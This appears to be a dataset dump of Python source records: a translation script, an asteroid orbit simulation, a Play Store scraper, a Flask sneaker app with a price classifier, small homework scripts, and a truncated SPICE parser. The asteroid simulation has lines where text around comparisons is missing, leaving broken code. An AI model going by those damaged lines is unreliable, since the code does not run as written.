{"seq_id":"296335034","text":"# using https://pypi.python.org/pypi/googletrans\n# pip install googletrans\n\nimport sys\nimport shutil\nfrom googletrans import Translator\nfrom datetime import datetime\ntranslator = Translator()\n\n\"\"\"\nFILE HANDLES\n\"\"\"\nlanguageList = [line.rstrip() for line in open(\"./languages.ykv\")]\njsonData = [line.rstrip() for line in open(sys.argv[1])]\n\nprint(jsonData)\n\nlog = open(\"./worklog.ykv\",\"w\");\n# print(languageList);\n# 
print(jsonData);\nprint(\"***********************************************************\\n\\n\");\nprint(\" TRANSLATING BOT APPLICATION \\n\");\nprint(\" https://github.com/yashkumarverma/\\n\\n\")\nprint(\"***********************************************************\");\n\nlog.write(\"***********************************************************\\n\\n\");\nlog.write(\" TRANSLATING SUSI AI CHAT APPLICATION \\n\");\nlog.write(\" https://github.com/yashkumarverma/\\n\\n\")\nlog.write(\"***********************************************************\");\n\n\"\"\"\nTRANSLATE ITEMS\n\"\"\"\nfor language in languageList:\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Working on language : \"+language+\"\\n\");\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" started\\n\")\n\t\n\t# translate\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" started\");\n\ttranslations = translator.translate(jsonData, dest=str(language));\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed\");\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed\\n\");\n\t\n\t# create json, build file and save\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Export to json for \" + language + \" started\");\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"Export to json for \" + language + \" started\");\n\tjsonFile = open(\"build/\"+language+\".json\",\"w\",encoding=\"utf8\");\n\tjsonRender = \"{\";\n\tfor translation in translations:\n\t\tjsonRender= jsonRender+'\"'+translation.origin+'\":'+'\"'+translation.text+'\",';\n\tjsonRender = jsonRender[:-1]\n\tjsonRender += \"}\";\n\tjsonFile.write(jsonRender);\n\tjsonFile.close();\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"Export to json for \" + language + \" completed\");\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Export to json for \" + language + \" completed\");\n\n\t# write logs\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed\");\t\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed \\n --- \\n\")\n\nprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Export to zip ...\");\nlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"starting zip export\");\n# creating zip\nshutil.make_archive(\"translated\", \"zip\", \"build\")\nlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"zip export complete\");\nprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Everything Done.\");\n\nprint(\"***********************************************************\\n\\n\");\nprint(\" Converted Application to 102 Languages \\n\");\nprint(\" Original Work of Yash Kumar Verma \\n\\n\")\nprint(\"***********************************************************\");\n\nlog.write(\"***********************************************************\\n\\n\");\nlog.write(\" Converted Application to 102 Languages \\n\");\nlog.write(\" Original Work of Yash Kumar Verma 
\\n\\n\")\nlog.write(\"***********************************************************\");\n\nlog.close();","sub_path":"agri/platforms/android/app/src/main/assets/www/scripts/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"201181644","text":"\"\"\"\nRuns n-body simulation of asteroids to see how close they approach Earth\n\n*More information in the README.md\n\n\"\"\"\n\n__author__ = \"John D. Hefele\"\n__email__ = \"jdavidhefele@gmail.com\"\n\nfrom amuse.lab import *\nfrom make_ss_1925 import *\nimport numpy as np\nimport os\n\n\ndef integrate_forward(pn_input,pn_output,dir_data,dt=0.02,total_t=500.):\n\n #Variables to alter\n max_asteroids=200\n dt= dt |units.yr\n total_t=total_t |units.yr\n\n #For setting printing options\n np.set_printoptions(linewidth=400, threshold=int(1e4), edgeitems=6)\n\n #Loads names of target asteroids\n asteroid_names=open(pn_input,'r')\n obj_name=asteroid_names.read().splitlines()\n obj_num=[]\n for i,row in enumerate(obj_name):\n #if i>0:\n split=row.strip('\\n').split('\\t')\n number=int(split[0])\n obj_num.append(number)\n num_asteroids=len(obj_num)\n if num_asteroids>max_asteroids:\n print('Running more than 200 asteroids at once will be slow!')\n\n print (obj_num)\n\n #Loads all asteroids coordinates\n fil_asteroid_coord=os.path.join(dir_data,'cart_asteroids.csv')\n print('Loading asteroid coordinates...')\n loaded_coords=np.genfromtxt(fil_asteroid_coord,delimiter=',')\n print('Done!')\n\n #Resets time and row number\n row_num=0\n t = 0 |units.yr\n\n #Initialize mercury\n converter = nbody_system.nbody_to_si(1.0 |units.MSun, 1.0 |units.AU)\n mer = Huayno(converter)\n mer.parameters.timestep = 0.05 |units.yr #Sets the initial timestep\n mer.initialize_code()\n\n #Creates the solar system and adds it to mercury\n ss=make_solar_system_1925(dir_data)\n mer.particles.add_particles(ss)\n\n #Find objects and sorts by epoch\n found_obj=[]\n for i,num in enumerate(obj_num):\n found_object=loaded_coords[np.where(loaded_coords[:,0] == num)]\n found_object.resize(found_object.size)\n found_obj.append(found_object) \n object_matrix=np.array(found_obj)\n object_matrix=object_matrix[object_matrix[:,1].argsort()]\n\n #Integrates planets and objects forward\n num_added=0\n last_number=0\n int_names=[]\n x_values=[]; y_values=[]; z_values=[]\n full=False\n print('Adding asteroids to simulations...')\n while t < total_t:\n epoch=t.number+2424151.5\n mer.evolve_model(t)\n if t.number<95.:\n x=mer.particles.x.value_in(units.AU)\n y=mer.particles.y.value_in(units.AU)\n z=mer.particles.z.value_in(units.AU)\n sun_pos=[x[0],y[0],z[0]]\n if num_added==num_asteroids and full==False:\n print('All asteroids added!')\n full=True\n while num_added=epoch:\n new_object = Particles(1)\n new_object.position= object_matrix[row_num,2:5]+sun_pos |units.AU\n new_object.velocity= object_matrix[row_num,5:8] |units.kms\n new_object.mass = 1.0e-6 | units.g # masses are negligible compared to Sun and planets, so we mostly ignore their\n # effects. 
Their own dynamics of course do not depend on it, so we set it to a negligible number\n # (1 micro gram)\n mer.particles.add_particles(new_object)\n int_names.append(object_matrix[row_num,0])\n row_num+=1\n num_added+=1\n else:\n break\n t+=dt\n else:\n x_values.append(mer.particles.x.value_in(units.AU))\n y_values.append(mer.particles.y.value_in(units.AU))\n z_values.append(mer.particles.z.value_in(units.AU))\n t+=dt\n if int(t.number%50)==0 and int(t.number)!=last_number:\n print('%s of out of %s years integrated...'%(int(t.number),int(total_t.number)))\n \n last_number=int(t.number)\n print('Simulation complete!')\n\n #Closes down mercury\n mer.cleanup_code()\n mer.stop()\n\n x_matrix=np.array(x_values)\n y_matrix=np.array(y_values)\n z_matrix=np.array(z_values)\n num_steps,_=x_matrix.shape\n\n #Create a matrix of earth positions\n earth_positions=np.zeros((num_steps,3)) \n earth_positions[:,0]=x_matrix[:,3] \n earth_positions[:,1]=y_matrix[:,3] \n earth_positions[:,2]=z_matrix[:,3]\n\n #Creates matrices for each asteroid\n num_planets=int(10)\n asteroid_matrices=[]\n for i in range(num_asteroids):\n asteroid_positions=np.zeros((num_steps,3))\n asteroid_positions[:,0]=x_matrix[:,i+num_planets] \n asteroid_positions[:,1]=y_matrix[:,i+num_planets] \n asteroid_positions[:,2]=z_matrix[:,i+num_planets]\n asteroid_matrices.append(asteroid_positions)\n\n #Find minimum distance\n print('Appending objects to file %s'%(pn_output))\n output=open(pn_output,'a')\n for i in range(num_asteroids):\n min_distance=10000000\n for j in range(num_steps):\n distance=np.linalg.norm(earth_positions[j]-asteroid_matrices[i][j])\n if distance https://play.google.com/store/search?q=social&c=apps&price=1&rating=0&gl=ie\r\n# 2nd URL => https://play.google.com/store/search?q=social&c=apps&price=2&rating=0&gl=ie\r\n# 3rd URL => https://play.google.com/store/apps/category/SOCIAL/collection/topselling_free?gl=ie\r\n\r\ndriver.get('https://play.google.com/store/search?q=social&c=apps&price=2&hl=en&gl=ie')\r\n\r\nmatch=False\r\nlenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\r\nwhile match ==False:\r\n\ttry:\r\n\t\tlastCount = lenOfPage\r\n\t\tdriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\t\r\n\t\ttime.sleep(2)\r\n\t\tlenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\r\n\t\tif lastCount==lenOfPage:\r\n\t\t\tmatch=True\r\n\t\tmore_button = driver.find_element_by_xpath('//*[@id=\"show-more-button\"]')\r\n\t\tmore_button.click()\r\n\r\n\texcept:\r\n\t\tcontinue\r\n\r\ncsv_file = open('social_paid.csv', 'w')\r\nwriter = csv.writer(csv_file)\r\n\r\napp_urls = driver.find_elements_by_xpath('.//a[@class = \"title\"]')\r\nprint (len(app_urls))\r\n\r\napp_urls_1 = [x.get_attribute('href') for x in app_urls]\r\n\r\nfor url in app_urls_1:\r\n\tdriver.get(url)\r\n\r\n\r\n\tapp_info= {}\r\n\r\n\r\n\tif driver.find_element_by_xpath('.//span[2][@class = \"T32cc UAO9ie\"]/a').text == 'Social':\r\n\t\tname = driver.find_element_by_xpath('.//h1[@class = \"AHFaub\"]/span').text\r\n\t\tcategory = driver.find_element_by_xpath('.//span[2][@class = \"T32cc UAO9ie\"]/a').text\r\n\t\tdeveloper = driver.find_element_by_xpath('.//span[1][@class = \"T32cc UAO9ie\"]/a').text\r\n\t\ttry:\r\n\t\t\tads = driver.find_element_by_xpath('.//div[@class = \"rxic6\"]').text\r\n\t\texcept:\r\n\t\t\tads = 
\"\"\r\n\t\ttry:\r\n\t\t\tnumberOfreviews = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\,?\\d+', driver.find_element_by_xpath(\".//span[@class = 'AYi5wd TBRnV']/span\").get_attribute('aria-label')).group(0)\r\n\t\texcept:\r\n\t\t\tnumberOfreviews = \"\"\r\n\r\n\t\tif numberOfreviews != \"\":\r\n\t\t\ttry:\r\n\t\t\t\trating = re.search(r'\\d*\\.?\\d+', driver.find_element_by_xpath('.//div[@class = \"pf5lIe\"]/div').get_attribute('aria-label')).group(0)\r\n\t\t\texcept:\r\n\t\t\t\trating = \"\"\r\n\t\telse:\r\n\t\t\trating = \"\"\r\n\r\n\t\ttry: \r\n\t\t\tif re.search('.k', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text) !=None:\r\n\t\t\t\tsize = int((re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\.?\\d+', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0).replace(',','')))/1000\r\n\t\t\telif re.search('.M', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text) != None:\r\n\t\t\t\tsize = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\.?\\d+', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0)\r\n\t\t\telse:\r\n\t\t\t\tsize = \"\"\r\n\t\texcept:\r\n\t\t\tsize = \"\"\r\n\r\n\t\tif size != \"\" or re.search(r'[a-z]', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0) !=None:\r\n\t\t\ttry:\r\n\t\t\t\tinstalls = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\,?\\d+', driver.find_element_by_xpath('.//div[4]/span[@class = \"htlgb\"]/div/span').text).group(0)\r\n\t\t\texcept:\r\n\t\t\t\tinstalls = \"\"\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tinstalls = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\,?\\d+', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0)\r\n\t\t\texcept:\r\n\t\t\t\tinstalls = \"\"\t\r\n\r\n\t\ttry:\r\n\t\t\tprice = re.search(r'\\d*\\.?\\d+', driver.find_element_by_xpath('.//span[@class = \"oocvOe\"]/button').get_attribute('aria-label')).group(0)\r\n\t\texcept:\r\n\t\t\tprice = \"\"\r\n\telse:\r\n\t\tcontinue\r\n\t\t\r\n\r\n\tapp_info['name'] = name\r\n\tapp_info['category'] = category\r\n\tapp_info['developer'] = developer\r\n\tapp_info['ads'] = ads\r\n\tapp_info['rating'] = rating\r\n\tapp_info['numberOfreviews'] = numberOfreviews\r\n\tapp_info['size'] = size\r\n\tapp_info['installs'] = installs\r\n\tapp_info['price'] = price\r\n\twriter.writerow(app_info.values())\r\n\r\n\r\ncsv_file.close()\r\ndriver.close()","sub_path":"SOCIALExtraction.py","file_name":"SOCIALExtraction.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"447484584","text":"import sys \n\ndef sum_lines():\n for line in sys.stdin:\n line = line.strip()\n print(line)\n tokens = line.split()\n print(tokens)\n print('Length: ',len(tokens))\n total = 0 \n for num in tokens:\n num = float(num)\n total = total + num \n print('Total: ',total)\n print('Average: ',total/len(tokens))\n\n\nsum_lines()\n\n","sub_path":"sum_line.py","file_name":"sum_line.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"373933876","text":"import skimage\nimport numpy as np\nimport csv\nimport time\nimport sys\nfrom skimage import data\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\n\n\ndef parsingTestCase(path):\n\tprint('=== parsing file from %s ===' % path)\n\tfilename = []\n\tindex = -1\n\n\ttext = 
open(path, 'r', encoding = 'big5')\n\trows = csv.reader(text, delimiter = ',')\n\n\tfor r in rows:\n\t\tif index != -1:\n\t\t\tfilename.append([])\n\t\t\tfor i in range(len(r)):\n\t\t\t\tfilename[index].append( int(r[i]) )\n\n\t\tindex += 1\t\n\n\tfilename = np.array(filename)\n\treturn filename\n\n\ndef loadImage(path, num):\n\timageArray = np.load(path)\n\tprint('original dimension ', imageArray.shape)\n\n\tpca = PCA(n_components=num, copy=False, whiten=True, svd_solver='full')\n\tnewData = pca.fit_transform(imageArray) \n\tprint('reduced dimension ' , newData.shape)\n\treturn newData\n\ndef clustering(data):\n\tkmeans = KMeans(n_clusters=2, random_state=100).fit(data)\n\tcount = 0\n\tfor i in range(len(kmeans.labels_)):\n\t\tif kmeans.labels_[i] == 0:\n\t\t\tcount += 1\n\n\tprint('class 0: %i | class 1: %i' % (count, len(kmeans.labels_)-count))\n\treturn kmeans.labels_\n\ndef tsneReduce(reduced_data):\n\ttime_start = time.time()\n\ttsne = TSNE(n_components=2, verbose=1, perplexity=50, n_iter=300)\n\ttsne_results = tsne.fit_transform(reduced_data)\n\ttime_end = time.time()\n\tprint('total used time: {}'.format(time_end - time_start))\n\treturn tsne_results\n\ndef prediction(Label, test):\n\tresult = []\n\tone_c = 0\n\tzero_c = 0\n\tfor i in range(len(test)):\n\t\tresult.append([])\n\t\tresult[i].append(i)\n\t\tindex1 = test[i][1]\n\t\tindex2 = test[i][2]\n\t\tif Label[index1] != Label[index2]:\n\t\t\tresult[i].append(0)\n\t\t\tzero_c += 1\n\t\telse:\n\t\t\tresult[i].append(1)\n\t\t\tone_c += 1\n\tprint('zero count: %i| one count: %i' % (zero_c, one_c))\n\treturn result\n\ndef outputAns(result, file):\n\ttext = open(file, \"w+\")\n\ts = csv.writer(text, delimiter=',', lineterminator='\\n')\n\ts.writerow([\"id\",\"Ans\"])\n\tfor i in range(len(result)):\n\t\ts.writerow(result[i]) \n\ttext.close()\n\t\n\nif __name__ == '__main__':\n\treducedData = loadImage(sys.argv[1], 400)\n\t# Label = tsneReduce(reducedData)\n\tLabel = clustering(reducedData)\n\tTestCase = parsingTestCase(sys.argv[2])\n\tresult = prediction(Label, TestCase)\n\toutputAns(result, sys.argv[3])\n\t\n","sub_path":"hw4/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"98285323","text":"#################\n#### imports ####\n#################\n \nfrom flask import render_template, Blueprint, request, redirect, url_for, flash, abort\nfrom flask_login import current_user, login_required\nfrom werkzeug.utils import secure_filename\nimport os\nimport pickle\n\nfrom project import db, app\nfrom project.models import Sneaker, User\nfrom .forms import AddSneakerForm, EditSneakerForm, PredPriceForm\nfrom .vectorizer import concat_features\n\n\ncur_dir = os.path.dirname(__file__)\nclf5 = pickle.load(open(os.path.join(cur_dir, 'objects', 'classifier5.pkl'), 'rb'))\n\n################\n#### config ####\n################\n \nsneakers_blueprint = Blueprint('sneakers', __name__)\n \nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\n##########################\n#### helper functions ####\n##########################\n\ndef flash_errors(form):\n    for field, errors in form.errors.items():\n        for error in errors:\n            flash(u\"Error in the %s field - %s\" % (\n                getattr(form, field).label.text,\n                error\n            ), 'info')\n\ndef allowed_file(filename):\n    return '.' 
in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n\ndef classify(retail_price, img_name, text):\n\n X = concat_features(retail_price, img_name, text)\n y = clf5.predict(X)\n proba = clf5.predict_proba(X).max()\n\n if y == 'lv0':\n price_min = retail_price - 10000\n pred = 'Less than {} JPY'.format(price_min)\n elif y == 'lv1':\n price_min = retail_price - 10000\n price_max = retail_price - 2500\n pred = '{} - {} JPY'.format(price_min, price_max)\n elif y == 'lv2':\n price_min = retail_price - 2500\n price_max = retail_price + 2500\n pred = '{} - {} JPY'.format(price_min, price_max)\n elif y == 'lv3':\n price_min = retail_price + 2500\n price_max = retail_price + 10000\n pred = '{} - {} JPY'.format(price_min, price_max)\n elif y == 'lv4':\n price_max = retail_price + 10000\n pred = 'More than {} JPY'.format(price_max)\n\n return pred, proba\n\n\n################\n#### routes ####\n################\n \n@sneakers_blueprint.route('/')\ndef public_sneakers():\n all_public_sneakers = Sneaker.query.filter_by(is_public=True)\n return render_template('public_sneakers.html', public_sneakers=all_public_sneakers)\n\n\n@sneakers_blueprint.route('/add', methods=['GET', 'POST'])\n@login_required\ndef add_sneaker():\n # Cannot pass in 'request.form' to AddRecipeForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause AddRecipeForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = AddSneakerForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n # check if the post request has the recipe_image part\n if 'sneaker_image' not in request.files:\n flash('No sneaker image provided!')\n return redirect(request.url)\n\n file = request.files['sneaker_image']\n\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n\n if not file:\n flash('File is empty!')\n return redirect(request.url)\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n filepath = os.path.join(app.config['UPLOADS_DEFAULT_DEST'], filename)\n file.save(filepath)\n url = os.path.join(app.config['UPLOADS_DEFAULT_URL'], filename)\n else:\n filename = ''\n url = ''\n\n name = form.sneaker_model_name.data\n price = form.sneaker_retail_price.data\n\n new_sneaker = Sneaker(name, price, current_user.id, form.sneaker_public.data, filename, url)\n \n db.session.add(new_sneaker)\n db.session.commit()\n flash('New sneaker, {}, added!'.format(new_sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.user_sneakers'))\n else:\n flash_errors(form)\n flash('ERROR! 
Sneaker was not added.', 'error')\n\n return render_template('add_sneaker.html', form=form)\n\n\n@sneakers_blueprint.route('/sneakers')\n@login_required\ndef user_sneakers():\n all_user_sneakers = Sneaker.query.filter_by(user_id=current_user.id)\n return render_template('user_sneakers.html', user_sneakers=all_user_sneakers)\n\n\n@sneakers_blueprint.route('/sneaker/')\ndef sneaker_details(sneaker_id):\n # sneaker_with_user = db.session.query(Sneaker, User).join(User).filter(Sneaker.id == sneaker_id).first()\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n \n # if sneaker_with_user is not None:\n if sneaker.is_public:\n return render_template('sneaker_detail.html', sneaker=sneaker)\n else:\n if current_user.is_authenticated and sneaker.user_id == current_user.id:\n return render_template('sneaker_detail.html', sneaker=sneaker)\n else:\n flash('Error! Incorrect permissions to access this sneaker.', 'error')\n\n return redirect(url_for('sneakers.public_sneakers'))\n\n\n@sneakers_blueprint.route('/delete/')\n@login_required\ndef delete_sneaker(sneaker_id):\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if not sneaker.user_id == current_user.id:\n flash('Error! Incorrect permissions to delete this sneaker.', 'error')\n return redirect(url_for('sneakers.public_sneakers'))\n\n db.session.delete(sneaker)\n db.session.commit()\n flash('{} was deleted.'.format(sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.user_sneakers'))\n\n\n@sneakers_blueprint.route('/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit_sneaker(sneaker_id):\n # Cannot pass in 'request.form' to EditRecipeForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause RecipeForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = EditSneakerForm()\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if not sneaker.user_id == current_user.id:\n flash('Error! 
Incorrect permissions to edit this sneaker.', 'error')\n return redirect(url_for('sneakers.public_sneakers'))\n\n if request.method == 'POST':\n if form.validate_on_submit():\n update_counter = 0\n\n if form.sneaker_model_name.data is not None and form.sneaker_model_name.data != sneaker.sneaker_model_name:\n flash('DEBUG: Updating sneaker.sneaker_model_name to {}.'.format(form.sneaker_model_name.data), 'debug')\n update_counter += 1\n sneaker.sneaker_model_name = form.sneaker_model_name.data\n\n if form.sneaker_retail_price.data is not None and form.sneaker_retail_price.data != sneaker.sneaker_retail_price:\n flash('DEBUG: Updating sneaker.sneaker_retail_price to {}.'.format(form.sneaker_retail_price.data), 'debug')\n update_counter += 1\n sneaker.sneaker_retail_price = form.sneaker_retail_price.data\n\n if form.sneaker_public.data != sneaker.is_public:\n flash('DEBUG: Updating sneaker.is_public to {}.'.format(form.sneaker_public.data), 'debug')\n update_counter += 1\n sneaker.is_public = form.sneaker_public.data\n\n if form.sneaker_image.has_file():\n flash('DEBUG: Updating sneaker.image_filename to {}.'.format(form.sneaker_image.data), 'debug')\n update_counter += 1\n file = request.files['sneaker_image']\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOADED_IMAGES_DEST'], filename))\n url = os.path.join(app.config['UPLOADED_IMAGES_URL'], filename)\n sneaker.image_filename = filename\n sneaker.image_url = url\n\n if update_counter > 0:\n db.session.add(sneaker)\n db.session.commit()\n flash('Sneaker has been updated for {}.'.format(sneaker.sneaker_model_name), 'success')\n else:\n flash('No updates made to the sneaker ({}). Please update at least one field.'.format(sneaker.sneaker_model_name), 'error')\n\n return redirect(url_for('sneakers.sneaker_details', sneaker_id=sneaker_id))\n else:\n flash_errors(form)\n flash('ERROR! Sneaker was not edited.', 'error')\n\n return render_template('edit_sneaker.html', form=form, sneaker=sneaker)\n\n\n@sneakers_blueprint.route('/admin/delete/')\n@login_required\ndef admin_delete_sneaker(sneaker_id):\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if not current_user.role == 'admin':\n flash('Error! Incorrect permissions to delete this sneaker.', 'error')\n return redirect(url_for('sneakers.public_sneakers'))\n\n db.session.delete(sneaker)\n db.session.commit()\n flash('{} was deleted.'.format(sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.admin_view_sneakers'))\n\n\n@sneakers_blueprint.route('/admin/edit/', methods=['GET', 'POST'])\n@login_required\ndef admin_edit_sneaker(sneaker_id):\n # Cannot pass in 'request.form' to EditRecipeForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause RecipeForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = EditSneakerForm()\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if current_user.role != 'admin':\n abort(403)\n\n if request.method == 'POST':\n if form.validate_on_submit():\n sneaker.import_form_data(request, form)\n db.session.add(sneaker)\n db.session.commit()\n flash('Sneaker has been updated for {}'.format(sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.admin_view_sneakers'))\n else:\n flash_errors(form)\n flash('ERROR! 
Sneaker was not edited.', 'error')\n\n    return render_template('admin_edit_sneaker.html', form=form, sneaker=sneaker)\n\n\n@sneakers_blueprint.route('/admin_view_sneakers')\n@login_required\ndef admin_view_sneakers():\n    if current_user.role != 'admin':\n        abort(403)\n    else:\n        sneakers = Sneaker.query.order_by(Sneaker.id).all()\n        return render_template('admin_view_sneakers.html', sneakers=sneakers)\n    return redirect(url_for('users.login'))\n\n\n\n#POST method is to allow the user to submit the form data\n#GET method is to allow the user to receive the form\n@sneakers_blueprint.route('/pred', methods=['GET', 'POST'])\ndef pred_price():\n    # Cannot pass in 'request.form' to PredPriceForm constructor, as this will cause 'request.files' to not be\n    # sent to the form. This will cause PredPriceForm to not see the file data.\n    # Flask-WTF handles passing form data to the form, so no parameters need to be included.\n    form = PredPriceForm()\n    if request.method == 'POST':\n        if form.validate_on_submit():\n            # check if the post request has the sneaker_image part\n            if 'sneaker_image' not in request.files:\n                flash('No sneaker image provided!')\n                return redirect(request.url)\n\n            file = request.files['sneaker_image']\n\n            if file.filename == '':\n                flash('No selected file')\n                return redirect(request.url)\n\n            if not file:\n                flash('File is empty!')\n                return redirect(request.url)\n\n            if file and allowed_file(file.filename):\n                filename = secure_filename(file.filename)\n                filepath = os.path.join(app.config['UPLOADS_DEFAULT_DEST'], filename)\n                file.save(filepath)\n                url = os.path.join(app.config['UPLOADS_DEFAULT_URL'], filename)\n            else:\n                filename = ''\n                url = ''\n                filepath = ''  # keep classify() below from raising a NameError when the upload is rejected\n\n            name = form.sneaker_model_name.data\n            price = form.sneaker_retail_price.data\n\n            # new_sneaker = Sneaker(name, \n            #                       price, \n            #                       filename, \n            #                       url)\n\n            # db.session.add(new_sneaker)\n            # db.session.commit()\n            # flash('New sneaker, {}, added!'.format(new_sneaker.sneaker_model_name), 'success')\n            \n            pred, proba = classify(price, filepath, name)\n            \n            return render_template('results.html', \n                                    content_name=name, \n                                    content_price=price,\n                                    prediction=pred, \n                                    probability=round(proba*100, 2))\n\n        else:\n            flash_errors(form)\n            flash('ERROR! Sneaker was not added.', 'error')\n    \n    return render_template('pred_price.html', form=form)\n\n","sub_path":"web/project/sneakers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"428779416","text":"# line comment\n# aula 03, example 01\n# Cacio\n\nx = int(input(\"Digite o primeiro valor: \"))\nsinal = input(\"Digite um sinal? \")\ny = int(input(\"Digite o segundo valor: \"))\np = 0\nwhile sinal != 'false' :\n    if sinal == '+':\n        p = x + y;\n        sinal = 'false'\n        print('A soma dos dois numeros É:',p)\n    elif (sinal == '-'):\n        p = x - y;\n        print('A diferença dos dois numeros É:',p)\n        sinal = 'false'\n    elif(sinal == '/'):\n        p = x / y;\n        print('O quociente dos dois numeros É:',p)\n        sinal = 'false'\n    elif (sinal == '*'):\n        p = x * y;\n        print('O produto dos dois numeros É:',p)\n        sinal = 'false'\n    else:\n        print('Digite um operador valido')\n        sinal = 'false'\n    \n    sinal = input(\"Digite um sinal? 
\")\n \n","sub_path":"Logica Programacao/aula03.py","file_name":"aula03.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"347131591","text":"import random\r\ndef prime(n):\r\n count=0\r\n for i in range(2,n+1):\r\n if n%i==0:\r\n count+=1\r\n if count==1:\r\n return (1)\r\n else:\r\n return (0)\r\nn=int(input(\"Enter a number:\"))\r\ndef before_prime(n):\r\n while n>1:\r\n if prime(n-1)==1:\r\n return n-1 \r\n else :\r\n n=n-1\r\nspl_p_l=[]\r\nnum=n\r\nwhile num>2:\r\n spl_p_l.append(before_prime(num))\r\n num-=1\r\nspl=list(set(spl_p_l))\r\nprint(spl)\r\n\r\n \r\n","sub_path":"customized_prime_numbers_list.py","file_name":"customized_prime_numbers_list.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"206161520","text":"# Parse the SPICE raw output to extract dataset and pickle it\n\nimport itertools as it\nimport re\n\nimport numpy as np\n\nfrom dataset import MyDataset\nfrom utils import pkl_dump\n\nshuffle_array = MyDataset.shuffle_seq\nsplit_array = MyDataset.split_seq\n\nregx = re.compile(r'\\t(\\d\\.\\d+e[+-]\\d+)\\n')\nwith open('FET.raw', 'r') as f:\n line_iter = iter(f.readlines())\n\nmatched = map(regx.findall, line_iter)\nchain = it.chain.from_iterable(filter(lambda x: x, 